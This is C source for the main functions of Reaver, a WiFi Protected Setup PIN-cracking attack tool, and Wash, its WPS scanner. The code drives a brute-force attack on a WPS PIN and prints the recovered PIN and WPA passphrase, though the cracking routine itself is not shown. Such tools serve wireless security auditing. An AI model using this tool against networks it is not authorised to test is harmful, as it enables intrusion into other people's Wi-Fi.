int reaver_main(int argc, char **argv)
{
int ret_val = EXIT_FAILURE, r = 0;
time_t start_time = 0, end_time = 0;
struct wps_data *wps = NULL;
globule_init();
init_default_settings();
fprintf(stderr, "\nReaver v%s WiFi Protected Setup Attack Tool\n", get_version());
fprintf(stderr, "Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <*****@*****.**>\n\n");
if(argc < 2)
{
ret_val = reaver_usage(argv[0]);
goto end;
}
/* Process the command line arguments */
if(process_arguments(argc, argv) == EXIT_FAILURE)
{
ret_val = reaver_usage(argv[0]);
goto end;
}
/* Double check reaver_usage */
if(!get_iface() || (memcmp(get_bssid(), NULL_MAC, MAC_ADDR_LEN) == 0))
{
reaver_usage(argv[0]);
goto end;
}
/* If no MAC address was provided, get it ourselves */
if(memcmp(get_mac(), NULL_MAC, MAC_ADDR_LEN) == 0)
{
if(!read_iface_mac())
{
fprintf(stderr, "[-] Failed to retrieve a MAC address for interface '%s'!\n", get_iface());
goto end;
}
}
/* Sanity checking on the message timeout value */
if(get_m57_timeout() > M57_MAX_TIMEOUT)
{
set_m57_timeout(M57_MAX_TIMEOUT);
}
else if(get_m57_timeout() <= 0)
{
set_m57_timeout(M57_DEFAULT_TIMEOUT);
}
/* Sanity checking on the receive timeout value */
if(get_rx_timeout() <= 0)
{
set_rx_timeout(DEFAULT_TIMEOUT);
}
/* Initialize signal handlers */
sigint_init();
sigalrm_init();
/* Mark the start time */
start_time = time(NULL);
/* Do it. */
crack();
/* Mark the end time */
end_time = time(NULL);
/* Check our key status */
if(get_key_status() == KEY_DONE)
{
wps = get_wps();
cprintf(VERBOSE, "[+] Pin cracked in %d seconds\n", (int) (end_time - start_time));
cprintf(CRITICAL, "[+] WPS PIN: '%s'\n", get_pin());
if(wps->key) cprintf(CRITICAL, "[+] WPA PSK: '%s'\n", wps->key);
if(wps->essid) cprintf(CRITICAL, "[+] AP SSID: '%s'\n", wps->essid);
/* Run user-supplied command */
if(get_exec_string())
{
r = system(get_exec_string());
}
ret_val = EXIT_SUCCESS;
}
else
{
cprintf(CRITICAL, "[-] Failed to recover WPA key\n");
}
save_session();
end:
globule_deinit();
return ret_val;
}
int main(int argc, char *argv[])
{
int c = 0;
FILE *fp = NULL;
int long_opt_index = 0, i = 0, channel = 0, passive = 0, mode = 0;
int source = INTERFACE, ret_val = EXIT_FAILURE;
struct bpf_program bpf = { 0 };
char *out_file = NULL, *last_optarg = NULL, *target = NULL, *bssid = NULL;
char *short_options = "i:c:n:o:b:5sfuCDh";
struct option long_options[] = {
{ "bssid", required_argument, NULL, 'b' },
{ "interface", required_argument, NULL, 'i' },
{ "channel", required_argument, NULL, 'c' },
{ "out-file", required_argument, NULL, 'o' },
{ "probes", required_argument, NULL, 'n' },
{ "daemonize", no_argument, NULL, 'D' },
{ "file", no_argument, NULL, 'f' },
{ "ignore-fcs", no_argument, NULL, 'C' },
{ "5ghz", no_argument, NULL, '5' },
{ "scan", no_argument, NULL, 's' },
{ "survey", no_argument, NULL, 'u' },
{ "help", no_argument, NULL, 'h' },
{ 0, 0, 0, 0 }
};
fprintf(stderr, "\nWash v%s WiFi Protected Setup Scan Tool\n", PACKAGE_VERSION);
fprintf(stderr, "Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <*****@*****.**>\n\n");
globule_init();
sql_init();
create_ap_table();
set_auto_channel_select(0);
set_wifi_band(BG_BAND);
set_debug(INFO);
set_validate_fcs(1);
set_log_file(stdout);
set_max_num_probes(DEFAULT_MAX_NUM_PROBES);
while((c = getopt_long(argc, argv, short_options, long_options, &long_opt_index)) != -1)
{
switch(c)
{
case 'f':
source = PCAP_FILE;
break;
case 'i':
set_iface(optarg);
break;
case 'b':
bssid = strdup(optarg);
break;
case 'c':
channel = atoi(optarg);
set_fixed_channel(1);
break;
case '5':
set_wifi_band(AN_BAND);
break;
case 'n':
set_max_num_probes(atoi(optarg));
break;
case 'o':
out_file = strdup(optarg);
break;
case 's':
mode = SCAN;
break;
case 'u':
mode = SURVEY;
break;
case 'C':
set_validate_fcs(0);
break;
case 'D':
daemonize();
break;
default:
usage(argv[0]);
goto end;
}
/* Track the last optarg. This is used later when looping back through any specified pcap files. */
if(optarg)
{
if(last_optarg)
{
free(last_optarg);
}
last_optarg = strdup(optarg);
}
}
/* The interface value won't be set if capture files were specified; else, there should have been an interface specified */
if(!get_iface() && source != PCAP_FILE)
{
usage(argv[0]);
goto end;
}
if(get_iface() && source == PCAP_FILE)
{
cprintf(CRITICAL, "[X] ERROR: -i and -f options cannot be used together.\n");
usage(argv[0]);
goto end;
}
/* If we're reading from a file, be sure we don't try to transmit probe requests */
if(source == PCAP_FILE)
{
passive = 1;
}
/* Open the output file, if any. If none, write to stdout. */
if(out_file)
{
fp = fopen(out_file, "wb");
if(!fp)
{
cprintf(CRITICAL, "[X] ERROR: Failed to open '%s' for writing\n", out_file);
goto end;
}
set_log_file(fp);
}
/*
* Loop through all of the specified capture sources. If an interface was specified, this will only loop once and the
* call to monitor() will block indefinitely. If capture files were specified, this will loop through each file specified
* on the command line and monitor() will return after each file has been processed.
*/
for(i=argc-1; i>0; i--)
{
/* If the source is a pcap file, get the file name from the command line */
if(source == PCAP_FILE)
{
/* If we've gotten to the arguments, we're done */
if((argv[i][0] == '-') ||
(last_optarg && (memcmp(argv[i], last_optarg, strlen(last_optarg)) == 0))
)
{
break;
}
else
{
target = argv[i];
}
}
/* Else, use the specified interface name */
else
{
target = get_iface();
}
set_handle(capture_init(target));
if(!get_handle())
{
cprintf(CRITICAL, "[X] ERROR: Failed to open '%s' for capturing\n", get_iface());
goto end;
}
if(pcap_compile(get_handle(), &bpf, PACKET_FILTER, 0, 0) != 0)
{
cprintf(CRITICAL, "[X] ERROR: Failed to compile packet filter\n");
goto end;
}
if(pcap_setfilter(get_handle(), &bpf) != 0)
{
cprintf(CRITICAL, "[X] ERROR: Failed to set packet filter\n");
goto end;
}
/* Do it. */
monitor(bssid, passive, source, channel, mode);
printf("\n");
}
ret_val = EXIT_SUCCESS;
end:
globule_deinit();
sql_cleanup();
if(bssid) free(bssid);
if(out_file) free(out_file);
if(wpsmon.fp) fclose(wpsmon.fp);
return ret_val;
}
